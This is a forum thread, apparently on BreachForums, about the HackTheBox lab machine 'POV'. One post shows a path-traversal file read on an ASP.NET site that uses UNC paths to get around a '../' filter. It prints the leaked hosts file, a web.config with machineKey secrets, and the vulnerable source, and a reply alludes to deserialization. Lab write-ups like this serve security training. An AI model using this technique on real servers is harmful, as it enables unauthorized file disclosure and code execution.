JOIN BREACHFORUMS TELEGRAM
POV - HTB
by Art10n - Saturday January 27, 2024 at 10:29 AM
Elite User

Posts: 312
Threads: 7
Joined: Oct 2023
Reputation: 0
#1
Jan 27, 2024, 10:29 AM
Welcome to POV - HTB

Medium box released 27 Jan 2024
Reply
Elite User

Posts: 312
Threads: 7
Joined: Oct 2023
Reputation: 0
#2
Jan 27, 2024, 07:34 PM (This post was last modified: Jan 27, 2024, 07:40 PM by Art10n.)
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
...

file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts

---
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 pov.htb dev.pov.htb
file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config


---

<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
index.aspx.cs

using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text.RegularExpressions;
using System.Text;
using System.IO;
using System.Net;

public partial class index : System.Web.UI.Page {
protected void Page_Load(object sender, EventArgs e) {

}

protected void Download(object sender, EventArgs e) {

var filePath = file.Value;
filePath = Regex.Replace(filePath, "../", "");
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition","attachment; filename=" + filePath);
Response.TransmitFile(filePath);
Response.End();

}
}
Reply
Breached
Member
Posts: 1
Threads: 0
Joined: Jan 2024
Reputation: 0
#3
Jan 29, 2024, 01:33 PM
[quote="Art10n" pid='383286' dateline='1706384075']
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
...

file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts

---
# localhost name resolution is handled within DNS itself.
# 127.0.0.1      localhost
# ::1            localhost
127.0.0.1  pov.htb dev.pov.htb
file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config



index.aspx.cs


how did you know what files to look for? Like the dev folder inside wwwroot? Does it have something to do with the sub domain?
Reply
Breached
Member
Posts: 10
Threads: 0
Joined: Feb 2024
Reputation: 0
#4
Feb 21, 2024, 08:15 PM
The deserialization is insane.
Reply
Breached
Member
Posts: 4
Threads: 0
Joined: Nov 2023
Reputation: 0
#5
Feb 24, 2024, 07:09 PM
Interest information to helping solve the box
Reply
VIP User
VIP
Posts: 13
Threads: 0
Joined: Oct 2023
Reputation: 10
#6
Feb 25, 2024, 11:01 AM
good solution to fix
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 15 854 8 hours ago
Last Post: 0x5k1z0
  CPTS-FLAG darkcat 14 5,746 8 hours ago
Last Post: Sukon
  [FREE] CPTS 12 FLAGS pulsebreaker 78 2,641 8 hours ago
Last Post: hitlerssecretsidechick
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 91 8,317 8 hours ago
Last Post: hitlerssecretsidechick
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 381 94,661 11 hours ago
Last Post: xixi75

Forum Jump:


 Users browsing this forum: 1 Guest(s)